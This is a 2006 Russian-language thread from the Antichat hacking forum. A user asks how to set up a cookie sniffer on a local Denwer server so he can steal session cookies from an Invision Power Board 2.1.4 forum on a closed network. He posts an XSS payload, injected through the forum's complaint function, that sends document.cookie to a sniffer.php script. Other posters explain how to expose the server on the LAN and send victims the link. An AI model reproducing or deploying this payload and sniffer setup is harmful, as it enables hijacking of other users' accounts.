Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф? (https://forum.antichat.xyz/showthread.php?t=29840)

karabym 25.12.2006 07:54
Ipb 2.1.4. форум крутится в закрытой сетке. как правильно настроить сниф?
 
Собстевнно как правильно настроить сниф на денвере локально...

Хочу вытащить куки с ipb 2.1.4 метод понял как а вот

сниф как правильно настроить хз :)

Спрашивается а зачем тебе локально то :)

Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....

Вот вопрочец ещо по xss через функции жалоба

<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>

Почему собственно сниф в .php я так понимаю что в
версии 2.1.4 нет фильтрации на даный метод и даже не обязательно шифроваться под gif ?!

ToniKapuchon 25.12.2006 08:02
А чё то так и не понял, что ты хочешь!!! в чём у тебя проблема ты не можешь всунуть скрипт в форум, или у тебя проблемы со скриптом, который получит кукки!??

karabym 25.12.2006 08:04
ДА нет хочу сниф настроить локально у себя на вебсерваке так как сетка закрытая...

Вобщем как правильно его натроить чтоб перехватывал куки

Я так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!

def_ 25.12.2006 08:14
Цитата:
Собстевнно как правильно настроить сниф на денвере локально...
Хочу вытащить куки с ipb 2.1.4 метод понял как а вот
сниф как правильно настроить хз
Спрашивается а зачем тебе локально то
Да потомучто форум крутится в закрытой сетке в тырнет доступа нет....
ты что-то путаешь - локально, это когда ты обращаешься к скрипту с той же машины на котором он работает адрес в этом случае будет: 127.0.0.1/script.php или localhost/script.php. если тебе нужно обратиться у скрипту из локальной сети, проблемы нет - делаешь это по ip под которым комп зарегестрирован в сети.

вторую часть вопроса вообще не понял, переформулируй его как-нибудь чтоли, распиши подробнее

def_ 25.12.2006 08:17
теперь понял, дополнительной настройки тебе никакой не надо просто ставишь сервак, делаешь дотупным из сети, заливаешь сниффер, кидаешь кому надо ссылку на него, в ней адрес до твоего сервака это твой ip в локальной сети

karabym 25.12.2006 08:18
Распишу поподробней :
Есть скрипт снифа кидаю его сюда home\custom\www
в файле .htaccess делаю настройки чтоб порт 80 светился в сетке
далее на форуме юзаю данную xss через функции (жалоба)

Правильно ?! или всеже денвер нужно донастроить чтоб он перехватывал куки...

_Great_ 25.12.2006 08:21
Цитата:
так понимаю кинуть сниф в папку вебсерва и натроить денвер чтоб он глядел в сеть маловато будет ?!
вполне нормально. так и сделай

def_ 25.12.2006 08:21
ничего донастраивать не надо, у тебя же куки передаются просто как параметры у скрипта

Dmitriy507 25.12.2006 08:23
чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом

_Great_ 25.12.2006 08:23
def_, угу.. просто будет типа http://yourcomp/sniffer.php?cookie=КУКИСЫ.
Отсюда видно, что достаточно настроить денвер так, чтобы он работал не только локально, а чтобы его было видно и из локалки.

Dmitry507, ты что-то странное куришь) бросай0))


Время: 06:48
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице